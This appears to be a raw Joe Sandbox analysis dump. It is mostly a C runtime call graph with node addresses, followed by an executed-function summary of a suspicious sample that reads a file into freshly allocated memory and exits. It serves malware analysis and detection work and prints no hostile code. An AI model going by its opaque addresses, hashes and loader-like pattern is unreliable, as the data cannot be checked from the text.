22311->22314 22313 1353ee8 22313->21774 22314->22313 22315->21897 22319 1363699 LeaveCriticalSection 22316->22319 22318 1356861 22318->21747 22319->22318 22321 1366e5b 22320->22321 22347 1366f44 22320->22347 22322 1366e6c 22321->22322 22323 1364b6e ___free_lconv_mon 14 API calls 22321->22323 22324 1366e7e 22322->22324 22325 1364b6e ___free_lconv_mon 14 API calls 22322->22325 22323->22322 22326 1366e90 22324->22326 22328 1364b6e ___free_lconv_mon 14 API calls 22324->22328 22325->22324 22327 1366ea2 22326->22327 22329 1364b6e ___free_lconv_mon 14 API calls 22326->22329 22330 1366eb4 22327->22330 22331 1364b6e ___free_lconv_mon 14 API calls 22327->22331 22328->22326 22329->22327 22332 1366ec6 22330->22332 22333 1364b6e ___free_lconv_mon 14 API calls 22330->22333 22331->22330 22334 1366ed8 22332->22334 22336 1364b6e ___free_lconv_mon 14 API calls 22332->22336 22333->22332 22335 1366eea 22334->22335 22337 1364b6e ___free_lconv_mon 14 API calls 22334->22337 22338 1366efc 22335->22338 22339 1364b6e ___free_lconv_mon 14 API calls 22335->22339 22336->22334 22337->22335 22340 1366f0e 22338->22340 22341 1364b6e ___free_lconv_mon 14 API calls 22338->22341 22339->22338 22342 1366f20 22340->22342 22343 1364b6e ___free_lconv_mon 14 API calls 22340->22343 22341->22340 22344 1364b6e ___free_lconv_mon 14 API calls 22342->22344 22345 1366f32 22342->22345 22343->22342 22344->22345 22346 1364b6e ___free_lconv_mon 14 API calls 22345->22346 22345->22347 22346->22347 22347->21788 22349 136719d 22348->22349 22359 13671f5 22348->22359 22350 13671ad 22349->22350 22351 1364b6e ___free_lconv_mon 14 API calls 22349->22351 22352 13671bf 22350->22352 22353 1364b6e ___free_lconv_mon 14 API calls 22350->22353 22351->22350 22354 13671d1 22352->22354 22355 1364b6e ___free_lconv_mon 14 API calls 22352->22355 22353->22352 22356 13671e3 22354->22356 22357 1364b6e ___free_lconv_mon 14 API calls 22354->22357 22355->22354 22358 1364b6e ___free_lconv_mon 14 API calls 22356->22358 22356->22359 22357->22356 22358->22359 22359->21790 22361 1368dd0 22360->22361 22362 1368db1 22360->22362 22361->21798 22362->22361 22366 1367274 22362->22366 22365 1364b6e ___free_lconv_mon 14 API calls 22365->22361 22367 1367352 22366->22367 22368 1367285 22366->22368 22367->22365 22402 1367640 22368->22402 22371 1367640 __strnicoll 14 API calls 22372 1367298 22371->22372 22373 1367640 __strnicoll 14 API calls 22372->22373 22374 13672a3 22373->22374 22375 1367640 __strnicoll 14 API calls 22374->22375 22376 13672ae 22375->22376 22377 1367640 __strnicoll 14 API calls 22376->22377 22378 13672bc 22377->22378 22379 1364b6e ___free_lconv_mon 14 API calls 22378->22379 22380 13672c7 22379->22380 22381 1364b6e ___free_lconv_mon 14 API calls 22380->22381 22382 13672d2 22381->22382 22383 1364b6e ___free_lconv_mon 14 API calls 22382->22383 22384 13672dd 22383->22384 22385 1367640 __strnicoll 14 API calls 22384->22385 22386 13672eb 22385->22386 22387 1367640 __strnicoll 14 API calls 22386->22387 22388 13672f9 22387->22388 22389 1367640 __strnicoll 14 API calls 22388->22389 22390 136730a 22389->22390 22391 1367640 __strnicoll 14 API calls 22390->22391 22392 1367318 22391->22392 22393 1367640 __strnicoll 14 API calls 22392->22393 22394 1367326 22393->22394 22395 1364b6e ___free_lconv_mon 14 API calls 22394->22395 22396 1367331 22395->22396 22397 1364b6e ___free_lconv_mon 14 API calls 22396->22397 22398 136733c 22397->22398 22399 1364b6e ___free_lconv_mon 14 API calls 22398->22399 22400 1367347 22399->22400 22401 1364b6e ___free_lconv_mon 14 API calls 22400->22401 22401->22367 22403 1367652 22402->22403 22404 136728d 22403->22404 22405 1364b6e ___free_lconv_mon 14 API calls 22403->22405 22404->22371 22405->22403 22406->21758 19971 1364042 GetStartupInfoW 19972 13640f3 19971->19972 19973 136405f 19971->19973 19973->19972 19977 137023d 19973->19977 19975 1364087 19975->19972 19976 13640b7 GetFileType 19975->19976 19976->19975 19978 1370249 ___unDNameEx 19977->19978 19979 1370273 19978->19979 19980 1370252 19978->19980 19990 1363682 EnterCriticalSection 19979->19990 19981 13676c8 __dosmaperr 14 API calls 19980->19981 19983 1370257 19981->19983 19984 1364c41 __strnicoll 41 API calls 19983->19984 19985 1370261 19984->19985 19985->19975 19986 13702ab 19998 13702d2 19986->19998 19988 137027f 19988->19986 19991 137018d 19988->19991 19990->19988 19992 1367808 __dosmaperr 14 API calls 19991->19992 19993 137019f 19992->19993 19997 13701ac 19993->19997 20001 13629cf 19993->20001 19994 1364b6e ___free_lconv_mon 14 API calls 19996 1370201 19994->19996 19996->19988 19997->19994 20006 1363699 LeaveCriticalSection 19998->20006 20000 13702d9 20000->19985 20002 13630d1 __dosmaperr 5 API calls 20001->20002 20003 13629eb 20002->20003 20004 1362a09 InitializeCriticalSectionAndSpinCount 20003->20004 20005 13629f4 20003->20005 20004->20005 20005->19993 20006->20000 20532 135a048 20535 1359fab 20532->20535 20536 1359fb7 ___unDNameEx 20535->20536 20537 135a001 20536->20537 20538 1359fca __fread_nolock 20536->20538 20547 1359fef 20536->20547 20548 1365c5d EnterCriticalSection 20537->20548 20540 13676c8 __dosmaperr 14 API calls 20538->20540 20542 1359fe4 20540->20542 20541 135a00b 20549 135a082 20541->20549 20544 1364c41 __strnicoll 41 API calls 20542->20544 20544->20547 20548->20541 20552 135a093 __fread_nolock 20549->20552 20562 135a022 20549->20562 20550 135a09f 20551 13676c8 __dosmaperr 14 API calls 20550->20551 20553 135a0a4 20551->20553 20552->20550 20559 135a0f1 20552->20559 20552->20562 20554 1364c41 __strnicoll 41 API calls 20553->20554 20554->20562 20556 135a218 __fread_nolock 20560 13676c8 __dosmaperr 14 API calls 20556->20560 20558 1380f73 __fread_nolock 41 API calls 20558->20559 20559->20556 20559->20558 20561 13810ae __fread_nolock 53 API calls 20559->20561 20559->20562 20566 138195b 20559->20566 20587 1358bd5 20559->20587 20560->20553 20561->20559 20563 135a040 20562->20563 20641 1365c71 LeaveCriticalSection 20563->20641 20565 135a046 20565->20547 20567 1381a29 20566->20567 20568 1381a36 20567->20568 20571 1381a4e 20567->20571 20569 13676c8 __dosmaperr 14 API calls 20568->20569 20570 1381a3b 20569->20570 20572 1364c41 __strnicoll 41 API calls 20570->20572 20573 1381aad 20571->20573 20581 1381a46 20571->20581 20601 1389bad 20571->20601 20572->20581 20575 1380f73 __fread_nolock 41 API calls 20573->20575 20576 1381ac6 20575->20576 20606 1380f9a 20576->20606 20579 1380f73 __fread_nolock 41 API calls 20580 1381aff 20579->20580 20580->20581 20582 1380f73 __fread_nolock 41 API calls 20580->20582 20581->20559 20583 1381b0d 20582->20583 20583->20581 20584 1380f73 __fread_nolock 41 API calls 20583->20584 20585 1381b1b 20584->20585 20586 1380f73 __fread_nolock 41 API calls 20585->20586 20586->20581 20588 1358be6 20587->20588 20592 1358be2 UnDecorator::getCHPEName 20587->20592 20589 1358bed 20588->20589 20594 1358c00 __fread_nolock 20588->20594 20590 13676c8 __dosmaperr 14 API calls 20589->20590 20591 1358bf2 20590->20591 20593 1364c41 __strnicoll 41 API calls 20591->20593 20592->20559 20593->20592 20594->20592 20595 1358c37 20594->20595 20596 1358c2e 20594->20596 20595->20592 20598 13676c8 __dosmaperr 14 API calls 20595->20598 20597 13676c8 __dosmaperr 14 API calls 20596->20597 20599 1358c33 20597->20599 20598->20599 20600 1364c41 __strnicoll 41 API calls 20599->20600 20600->20592 20602 1367808 __dosmaperr 14 API calls 20601->20602 20603 1389bca 20602->20603 20604 1364b6e ___free_lconv_mon 14 API calls 20603->20604 20605 1389bd4 20604->20605 20605->20573 20607 1380fa6 ___unDNameEx 20606->20607 20608 1380fae 20607->20608 20609 1380fc6 20607->20609 20610 1367721 __dosmaperr 14 API calls 20608->20610 20611 1381083 20609->20611 20616 1380ffc 20609->20616 20613 1380fb3 20610->20613 20612 1367721 __dosmaperr 14 API calls 20611->20612 20614 1381088 20612->20614 20615 13676c8 __dosmaperr 14 API calls 20613->20615 20617 13676c8 __dosmaperr 14 API calls 20614->20617 20635 1380fbb 20615->20635 20618 138101a 20616->20618 20619 1381005 20616->20619 20621 1381012 20617->20621 20636 13702db EnterCriticalSection 20618->20636 20622 1367721 __dosmaperr 14 API calls 20619->20622 20628 1364c41 __strnicoll 41 API calls 20621->20628 20623 138100a 20622->20623 20625 13676c8 __dosmaperr 14 API calls 20623->20625 20624 1381020 20626 138103c 20624->20626 20627 1381051 20624->20627 20625->20621 20629 13676c8 __dosmaperr 14 API calls 20626->20629 20630 13810ae __fread_nolock 53 API calls 20627->20630 20628->20635 20631 1381041 20629->20631 20632 138104c 20630->20632 20633 1367721 __dosmaperr 14 API calls 20631->20633 20637 138107b 20632->20637 20633->20632 20635->20579 20635->20581 20636->20624 20640 13702fe LeaveCriticalSection 20637->20640 20639 1381081 20639->20635 20640->20639 20641->20565 19893 13534a6 19894 13534af 19893->19894 19901 1353c2d IsProcessorFeaturePresent 19894->19901 19898 13534c0 19899 13534c4 19898->19899 19911 13545d8 19898->19911 19902 13534bb 19901->19902 19903 13545b9 19902->19903 19917 13621bc 19903->19917 19906 13545c2 19906->19898 19908 13545ca 19909 13545d5 19908->19909 19931 13621f8 19908->19931 19909->19898 19912 13545e1 19911->19912 19913 13545eb 19911->19913 19914 135b153 ___vcrt_uninitialize_ptd 6 API calls 19912->19914 19913->19899 19915 13545e6 19914->19915 19916 13621f8 ___vcrt_uninitialize_locks DeleteCriticalSection 19915->19916 19916->19913 19918 13621c5 19917->19918 19920 13621ee 19918->19920 19922 13545be 19918->19922 19935 1382485 19918->19935 19921 13621f8 ___vcrt_uninitialize_locks DeleteCriticalSection 19920->19921 19921->19922 19922->19906 19923 135b120 19922->19923 19952 1382396 19923->19952 19926 135b135 19926->19908 19929 135b150 19929->19908 19932 1362222 19931->19932 19933 1362203 19931->19933 19932->19906 19934 136220d DeleteCriticalSection 19933->19934 19934->19932 19934->19934 19940 1382627 19935->19940 19938 13824bd InitializeCriticalSectionAndSpinCount 19939 13824a8 19938->19939 19939->19918 19941 1382648 19940->19941 19942 138249f 19940->19942 19941->19942 19943 13826b0 GetProcAddress 19941->19943 19945 13826a1 19941->19945 19947 13824cc LoadLibraryExW 19941->19947 19942->19938 19942->19939 19943->19942 19945->19943 19946 13826a9 FreeLibrary 19945->19946 19946->19943 19948 13824e3 GetLastError 19947->19948 19949 1382513 19947->19949 19948->19949 19950 13824ee ___vcrt_InitializeCriticalSectionEx 19948->19950 19949->19941 19950->19949 19951 1382504 LoadLibraryExW 19950->19951 19951->19941 19953 1382627 ___vcrt_InitializeCriticalSectionEx 5 API calls 19952->19953 19954 13823b0 19953->19954 19955 13823c9 TlsAlloc 19954->19955 19956 135b12a 19954->19956 19956->19926 19957 1382447 19956->19957 19958 1382627 ___vcrt_InitializeCriticalSectionEx 5 API calls 19957->19958 19959 1382461 19958->19959 19960 138247c TlsSetValue 19959->19960 19961 135b143 19959->19961 19960->19961 19961->19929 19962 135b153 19961->19962 19963 135b15d 19962->19963 19964 135b163 19962->19964 19966 13823d1 19963->19966 19964->19926 19967 1382627 ___vcrt_InitializeCriticalSectionEx 5 API calls 19966->19967 19968 13823eb 19967->19968 19969 1382403 TlsFree 19968->19969 19970 13823f7 19968->19970 19969->19970 19970->19964 19394 135a2c7 19395 135a2da __vswprintf_c_l 19394->19395 19400 135a76f 19395->19400 19403 135a77b ___unDNameEx 19400->19403 19401 135a781 19429 1364e5b 19401->19429 19402 135a7b5 19417 1365c5d EnterCriticalSection 19402->19417 19403->19401 19403->19402 19406 135a7c1 19418 135a683 19406->19418 19408 135a7d8 19438 135a801 19408->19438 19410 135a2ef 19411 135a44b 19410->19411 19412 135a457 19411->19412 19413 135a46e 19412->19413 19414 135a487 __vswprintf_c_l 41 API calls 19412->19414 19415 135a487 __vswprintf_c_l 41 API calls 19413->19415 19416 135a2fc 19413->19416 19414->19413 19415->19416 19417->19406 19419 135a696 19418->19419 19420 135a6a9 19418->19420 19419->19408 19441 135a5aa 19420->19441 19422 135a6cc 19423 135a75a 19422->19423 19424 135a6e7 19422->19424 19454 135a8e8 19422->19454 19423->19408 19445 1365762 19424->19445 19430 1364e72 19429->19430 19431 1364e6b 19429->19431 19437 1364e80 19430->19437 19885 1364ee8 19430->19885 19432 135a4a8 __vswprintf_c_l 16 API calls 19431->19432 19432->19430 19434 1364ea7 19434->19437 19888 1364c6e IsProcessorFeaturePresent 19434->19888 19436 1364ed7 19437->19410 19892 1365c71 LeaveCriticalSection 19438->19892 19440 135a809 19440->19410 19442 135a5bb 19441->19442 19444 135a613 19441->19444 19442->19444 19468 1381e3c 19442->19468 19444->19422 19446 136577b 19445->19446 19447 135a6fa 19445->19447 19446->19447 19582 1380f73 19446->19582 19451 1381e7c 19447->19451 19449 1365797 19589 13848db 19449->19589 19452 1382223 __fread_nolock 43 API calls 19451->19452 19453 1381e95 19452->19453 19453->19423 19455 135ad55 19454->19455 19456 135ad64 19455->19456 19457 135ad8c 19455->19457 19458 1364e5b _fwprintf_s 29 API calls 19456->19458 19459 1380f73 __fread_nolock 41 API calls 19457->19459 19467 135ad7f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19458->19467 19460 135ad95 19459->19460 19847 1381ea5 19460->19847 19463 135ae3f 19850 135a9eb 19463->19850 19465 135ae56 19465->19467 19862 135ab96 19465->19862 19467->19424 19469 1381e50 __vswprintf_c_l 19468->19469 19474 1382223 19469->19474 19471 1381e65 19472 135a44b __vswprintf_c_l 41 API calls 19471->19472 19473 1381e74 19472->19473 19473->19444 19480 136fdd7 19474->19480 19476 1382235 19477 1382251 SetFilePointerEx 19476->19477 19479 138223d __fread_nolock 19476->19479 19478 1382269 GetLastError 19477->19478 19477->19479 19478->19479 19479->19471 19481 136fde4 19480->19481 19484 136fdf9 19480->19484 19493 1367721 19481->19493 19485 1367721 __dosmaperr 14 API calls 19484->19485 19488 136fe1e 19484->19488 19486 136fe29 19485->19486 19489 13676c8 __dosmaperr 14 API calls 19486->19489 19488->19476 19491 136fe31 19489->19491 19490 136fdf1 19490->19476 19499 1364c41 19491->19499 19502 136388b GetLastError 19493->19502 19495 1367726 19496 13676c8 19495->19496 19497 136388b __dosmaperr 14 API calls 19496->19497 19498 13676cd 19497->19498 19498->19490 19576 1364f3a 19499->19576 19503 13638a1 19502->19503 19504 13638a7 19502->19504 19525 1362784 19503->19525 19508 13638ab SetLastError 19504->19508 19530 13627c3 19504->19530 19508->19495 19512 13638e0 19514 13627c3 __dosmaperr 6 API calls 19512->19514 19513 13638f1 19515 13627c3 __dosmaperr 6 API calls 19513->19515 19516 13638ee 19514->19516 19517 13638fd 19515->19517 19542 1364b6e 19516->19542 19518 1363901 19517->19518 19519 1363918 19517->19519 19521 13627c3 __dosmaperr 6 API calls 19518->19521 19548 1363a77 19519->19548 19521->19516 19524 1364b6e ___free_lconv_mon 12 API calls 19524->19508 19553 13630d1 19525->19553 19527 13627a0 19528 13627bb TlsGetValue 19527->19528 19529 13627a9 19527->19529 19529->19504 19531 13630d1 __dosmaperr 5 API calls 19530->19531 19532 13627df 19531->19532 19533 13627fd TlsSetValue 19532->19533 19534 13627e8 19532->19534 19534->19508 19535 1367808 19534->19535 19540 1367815 __fread_nolock 19535->19540 19536 1367855 19538 13676c8 __dosmaperr 13 API calls 19536->19538 19537 1367840 RtlAllocateHeap 19539 13638d8 19537->19539 19537->19540 19538->19539 19539->19512 19539->19513 19540->19536 19540->19537 19559 1364f71 19540->19559 19543 1364b79 HeapFree 19542->19543 19547 1364ba3 19542->19547 19544 1364b8e GetLastError 19543->19544 19543->19547 19545 1364b9b __dosmaperr 19544->19545 19546 13676c8 __dosmaperr 12 API calls 19545->19546 19546->19547 19547->19508 19562 1363e28 19548->19562 19554 13630ff 19553->19554 19558 13630fb __dosmaperr 19553->19558 19555 1362fe2 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 19554->19555 19554->19558 19556 1363113 19555->19556 19557 1363119 GetProcAddress 19556->19557 19556->19558 19557->19558 19558->19527 19560 1364fad __fread_nolock EnterCriticalSection LeaveCriticalSection 19559->19560 19561 1364f7c 19560->19561 19561->19540 19563 1363e34 ___unDNameEx 19562->19563 19564 1363682 __is_exception_typeof EnterCriticalSection 19563->19564 19565 1363e3e 19564->19565 19566 1363e6e __dosmaperr LeaveCriticalSection 19565->19566 19567 1363ae5 19566->19567 19568 1363e7a 19567->19568 19569 1363e86 ___unDNameEx 19568->19569 19570 1363682 __is_exception_typeof EnterCriticalSection 19569->19570 19571 1363e90 19570->19571 19572 1363a2c __dosmaperr 14 API calls 19571->19572 19573 1363ea8 19572->19573 19574 1363ec8 __dosmaperr LeaveCriticalSection 19573->19574 19575 1363923 19574->19575 19575->19524 19577 1364f4c __vswprintf_c_l 19576->19577 19578 1364e5b _fwprintf_s 29 API calls 19577->19578 19579 1364f64 19578->19579 19580 135a44b __vswprintf_c_l 41 API calls 19579->19580 19581 1364c4d 19580->19581 19581->19490 19583 1380f7f 19582->19583 19584 1380f94 19582->19584 19585 13676c8 __dosmaperr 14 API calls 19583->19585 19584->19449 19586 1380f84 19585->19586 19587 1364c41 __strnicoll 41 API calls 19586->19587 19588 1380f8f 19587->19588 19588->19449 19591 13848e7 ___unDNameEx 19589->19591 19590 13849ab 19592 1364e5b _fwprintf_s 29 API calls 19590->19592 19591->19590 19593 138493c 19591->19593 19599 13848ef 19591->19599 19592->19599 19600 13702db EnterCriticalSection 19593->19600 19595 1384942 19596 138495f 19595->19596 19601 13846db 19595->19601 19627 13849a3 19596->19627 19599->19447 19600->19595 19602 1384700 19601->19602 19624 1384723 __fread_nolock 19601->19624 19603 1384704 19602->19603 19605 1384762 19602->19605 19604 1364e5b _fwprintf_s 29 API calls 19603->19604 19604->19624 19606 1384779 19605->19606 19607 1381e7c __wsopen_s 43 API calls 19605->19607 19630 13849e3 19606->19630 19607->19606 19610 13847c9 19612 138482c WriteFile 19610->19612 19613 13847dd 19610->19613 19611 1384789 19614 1384790 19611->19614 19615 13847b3 19611->19615 19616 138484e GetLastError 19612->19616 19612->19624 19618 138481a 19613->19618 19619 13847e5 19613->19619 19614->19624 19637 1384e33 19614->19637 19642 1384a61 GetConsoleOutputCP 19615->19642 19616->19624 19670 1384e9b 19618->19670 19622 1384808 19619->19622 19623 13847ea 19619->19623 19662 138505f 19622->19662 19623->19624 19655 1384f76 19623->19655 19624->19596 19846 13702fe LeaveCriticalSection 19627->19846 19629 13849a9 19629->19599 19677 13852cb 19630->19677 19632 13849f5 19635 1384a23 19632->19635 19636 1384783 19632->19636 19686 1371420 19632->19686 19634 1384a3d GetConsoleMode 19634->19636 19635->19634 19635->19636 19636->19610 19636->19611 19639 1384e8a 19637->19639 19641 1384e55 19637->19641 19638 1384e8c GetLastError 19638->19639 19639->19624 19640 138a554 5 API calls __wsopen_s 19640->19641 19641->19638 19641->19639 19641->19640 19643 1384ad3 19642->19643 19651 1384ada UnDecorator::getCHPEName 19642->19651 19644 1371420 UnDecorator::getSymbolName 41 API calls 19643->19644 19644->19651 19646 1384e2c 19646->19624 19647 138869e 42 API calls swprintf 19647->19651 19648 1384d97 19838 1353e0d 19648->19838 19649 1389e23 5 API calls __wsopen_s 19649->19651 19651->19647 19651->19648 19651->19649 19652 1384d12 WriteFile 19651->19652 19654 1384d52 WriteFile 19651->19654 19835 136f1c0 19651->19835 19652->19651 19653 1384e0a GetLastError 19652->19653 19653->19648 19654->19651 19654->19653 19659 1384f85 __wsopen_s 19655->19659 19656 1385044 19657 1353e0d _ValidateLocalCookies 5 API calls 19656->19657 19661 138505d 19657->19661 19658 1384ffa WriteFile 19658->19659 19660 1385046 GetLastError 19658->19660 19659->19656 19659->19658 19660->19656 19661->19624 19669 138506e __wsopen_s 19662->19669 19663 1385176 19664 1353e0d _ValidateLocalCookies 5 API calls 19663->19664 19665 138518f 19664->19665 19665->19624 19666 136f1c0 _vsnprintf WideCharToMultiByte 19666->19669 19667 1385178 GetLastError 19667->19663 19668 138512d WriteFile 19668->19667 19668->19669 19669->19663 19669->19666 19669->19667 19669->19668 19671 1384eaa __wsopen_s 19670->19671 19674 1384f1a WriteFile 19671->19674 19676 1384f5b 19671->19676 19672 1353e0d _ValidateLocalCookies 5 API calls 19673 1384f74 19672->19673 19673->19624 19674->19671 19675 1384f5d GetLastError 19674->19675 19675->19676 19676->19672 19678 13852d8 19677->19678 19679 13852e5 19677->19679 19680 13676c8 __dosmaperr 14 API calls 19678->19680 19681 13676c8 __dosmaperr 14 API calls 19679->19681 19683 13852f1 19679->19683 19682 13852dd 19680->19682 19684 1385312 19681->19684 19682->19632 19683->19632 19685 1364c41 __strnicoll 41 API calls 19684->19685 19685->19682 19693 135a487 19686->19693 19688 1371430 19700 138445a 19688->19700 19694 135a491 19693->19694 19695 135a49a 19693->19695 19708 135a4a8 GetLastError 19694->19708 19695->19688 19697 135a496 19697->19695 19712 135b0bb 19697->19712 19701 1384471 19700->19701 19703 137144d 19700->19703 19701->19703 19784 1368dd5 19701->19784 19704 138448b 19703->19704 19705 137145a 19704->19705 19706 13844a2 19704->19706 19705->19635 19706->19705 19832 1364241 19706->19832 19709 135a4c1 19708->19709 19723 1363968 19709->19723 19745 136509e 19712->19745 19715 135b0cb 19717 135b0d5 IsProcessorFeaturePresent 19715->19717 19722 135b0f4 19715->19722 19719 135b0e1 19717->19719 19775 1364d13 19719->19775 19781 1355120 19722->19781 19724 1363981 19723->19724 19725 136397b 19723->19725 19727 13627c3 __dosmaperr 6 API calls 19724->19727 19744 135a4d9 SetLastError 19724->19744 19726 1362784 __dosmaperr 6 API calls 19725->19726 19726->19724 19728 136399b 19727->19728 19729 1367808 __dosmaperr 14 API calls 19728->19729 19728->19744 19730 13639ab 19729->19730 19731 13639b3 19730->19731 19732 13639c8 19730->19732 19733 13627c3 __dosmaperr 6 API calls 19731->19733 19734 13627c3 __dosmaperr 6 API calls 19732->19734 19742 13639bf 19733->19742 19735 13639d4 19734->19735 19736 13639e7 19735->19736 19737 13639d8 19735->19737 19740 1363a77 __dosmaperr 14 API calls 19736->19740 19739 13627c3 __dosmaperr 6 API calls 19737->19739 19738 1364b6e ___free_lconv_mon 14 API calls 19738->19744 19739->19742 19741 13639f2 19740->19741 19743 1364b6e ___free_lconv_mon 14 API calls 19741->19743 19742->19738 19743->19744 19744->19697 19746 136563b __is_exception_typeof EnterCriticalSection LeaveCriticalSection 19745->19746 19747 135b0c0 19746->19747 19747->19715 19748 1365296 19747->19748 19749 13652a2 ___unDNameEx 19748->19749 19750 136388b __dosmaperr 14 API calls 19749->19750 19753 13652cf __is_exception_typeof 19749->19753 19756 13652c9 __is_exception_typeof 19749->19756 19750->19756 19751 1365316 19752 13676c8 __dosmaperr 14 API calls 19751->19752 19754 136531b 19752->19754 19755 1365342 19753->19755 19758 1363682 __is_exception_typeof EnterCriticalSection 19753->19758 19757 1364c41 __strnicoll 41 API calls 19754->19757 19761 1365475 19755->19761 19763 1365384 19755->19763 19772 13653b3 19755->19772 19756->19751 19756->19753 19759 1365300 19756->19759 19757->19759 19758->19755 19759->19715 19760 1365422 __is_exception_typeof LeaveCriticalSection 19762 13653f9 19760->19762 19764 1365480 19761->19764 19765 1363699 __is_exception_typeof LeaveCriticalSection 19761->19765 19762->19759 19769 136373a _unexpected 41 API calls 19762->19769 19773 1365408 19762->19773 19768 136373a _unexpected 41 API calls 19763->19768 19763->19772 19766 1355120 __is_exception_typeof 23 API calls 19764->19766 19765->19764 19767 1365488 19766->19767 19770 13653a8 19768->19770 19769->19773 19771 136373a _unexpected 41 API calls 19770->19771 19771->19772 19772->19760 19773->19759 19774 136373a _unexpected 41 API calls 19773->19774 19774->19759 19776 1364d2f __fread_nolock __is_exception_typeof 19775->19776 19777 1364d5b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19776->19777 19778 1364e2c __is_exception_typeof 19777->19778 19779 1353e0d _ValidateLocalCookies 5 API calls 19778->19779 19780 1364e4a 19779->19780 19780->19722 19782 135531d __is_exception_typeof 23 API calls 19781->19782 19783 1355131 19782->19783 19783->19688 19785 1368de1 ___unDNameEx 19784->19785 19797 136373a GetLastError 19785->19797 19788 1368e30 19788->19703 19790 1368e08 19825 1368e56 19790->19825 19795 135b0bb __is_exception_typeof 41 API calls 19796 1368e55 19795->19796 19798 1363750 19797->19798 19799 1363756 19797->19799 19800 1362784 __dosmaperr 6 API calls 19798->19800 19801 13627c3 __dosmaperr 6 API calls 19799->19801 19803 136375a SetLastError 19799->19803 19800->19799 19802 1363772 19801->19802 19802->19803 19805 1367808 __dosmaperr 14 API calls 19802->19805 19807 13637ef 19803->19807 19808 13637ea 19803->19808 19806 1363787 19805->19806 19809 13637a0 19806->19809 19810 136378f 19806->19810 19811 135b0bb __is_exception_typeof 39 API calls 19807->19811 19808->19788 19824 1363682 EnterCriticalSection 19808->19824 19813 13627c3 __dosmaperr 6 API calls 19809->19813 19812 13627c3 __dosmaperr 6 API calls 19810->19812 19814 13637f4 19811->19814 19821 136379d 19812->19821 19815 13637ac 19813->19815 19816 13637c7 19815->19816 19817 13637b0 19815->19817 19820 1363a77 __dosmaperr 14 API calls 19816->19820 19818 13627c3 __dosmaperr 6 API calls 19817->19818 19818->19821 19819 1364b6e ___free_lconv_mon 14 API calls 19819->19803 19822 13637d2 19820->19822 19821->19819 19823 1364b6e ___free_lconv_mon 14 API calls 19822->19823 19823->19803 19824->19790 19826 1368e64 __strnicoll 19825->19826 19828 1368e19 19825->19828 19827 1368c0a __strnicoll 14 API calls 19826->19827 19826->19828 19827->19828 19829 1368e35 19828->19829 19830 1363699 __is_exception_typeof LeaveCriticalSection 19829->19830 19831 1368e2c 19830->19831 19831->19788 19831->19795 19833 136373a _unexpected 41 API calls 19832->19833 19834 1364246 19833->19834 19834->19705 19837 136f1d7 WideCharToMultiByte 19835->19837 19837->19651 19839 1353e15 19838->19839 19840 1353e16 IsProcessorFeaturePresent 19838->19840 19839->19646 19842 1354020 19840->19842 19845 1354105 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19842->19845 19844 1354103 19844->19646 19845->19844 19846->19629 19869 1382095 19847->19869 19851 135a9fa __wsopen_s 19850->19851 19852 1380f73 __fread_nolock 41 API calls 19851->19852 19854 135aa16 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19852->19854 19853 1353e0d _ValidateLocalCookies 5 API calls 19856 135ab94 19853->19856 19855 1381ea5 45 API calls 19854->19855 19861 135aa22 19854->19861 19857 135aa76 19855->19857 19856->19467 19858 135aaa8 ReadFile 19857->19858 19857->19861 19859 135aacf 19858->19859 19858->19861 19860 1381ea5 45 API calls 19859->19860 19860->19861 19861->19853 19863 1380f73 __fread_nolock 41 API calls 19862->19863 19864 135aba9 19863->19864 19865 1381ea5 45 API calls 19864->19865 19868 135abf1 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19864->19868 19866 135ac44 19865->19866 19867 1381ea5 45 API calls 19866->19867 19866->19868 19867->19868 19868->19467 19870 13820a1 ___unDNameEx 19869->19870 19871 138217f 19870->19871 19873 135adb3 19870->19873 19874 13820fd 19870->19874 19872 1364e5b _fwprintf_s 29 API calls 19871->19872 19872->19873 19873->19463 19873->19465 19873->19467 19880 13702db EnterCriticalSection 19874->19880 19876 1382103 19877 1382128 19876->19877 19878 1382223 __fread_nolock 43 API calls 19876->19878 19881 1382177 19877->19881 19878->19877 19880->19876 19884 13702fe LeaveCriticalSection 19881->19884 19883 138217d 19883->19873 19884->19883 19886 1364ef3 GetLastError SetLastError 19885->19886 19887 1364f0c 19885->19887 19886->19434 19887->19434 19889 1364c7a 19888->19889 19890 1364d13 __is_exception_typeof 8 API calls 19889->19890 19891 1364c8f GetCurrentProcess TerminateProcess 19890->19891 19891->19436 19892->19440

                                                                                              Executed Functions

                                                                                              Function 009508B7 Relevance: 6.4, APIs: 4, Instructions: 378COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 350 9508b7-9509ce call 95005f call 950838 call 950073 * 8 372 9509d5-9509e5 350->372 373 9509d0 350->373 376 9509e7 372->376 377 9509ec-950a0f CreateFileW 372->377 374 950d7e-950d81 373->374 376->374 378 950a16-950a3c VirtualAlloc ReadFile 377->378 379 950a11 377->379 380 950a43-950a56 378->380 381 950a3e 378->381 379->374 383 950a5c-950d63 380->383 384 950d68-950d77 call 95020a 380->384 381->374 387 950d79-950d7b ExitProcess 384->387
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263303661.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_950000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocNumaVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4233825816-0
                                                                                              • Opcode ID: 13d198a7ed654c0f64484b032afb88eacbcb13dff707d92e656ee87a2290426b
                                                                                              • Instruction ID: 73d2a9b90476bd27fec2ae6f7f693a98c838c8a68177f0ed0ce5e073a482eccb
                                                                                              • Opcode Fuzzy Hash: 13d198a7ed654c0f64484b032afb88eacbcb13dff707d92e656ee87a2290426b
                                                                                              • Instruction Fuzzy Hash: 89F19420D4D2D9ADDB12CBE994157FCBFB09F26202F0841D6E4E4B6283C17A834EDB25
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009507DA Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

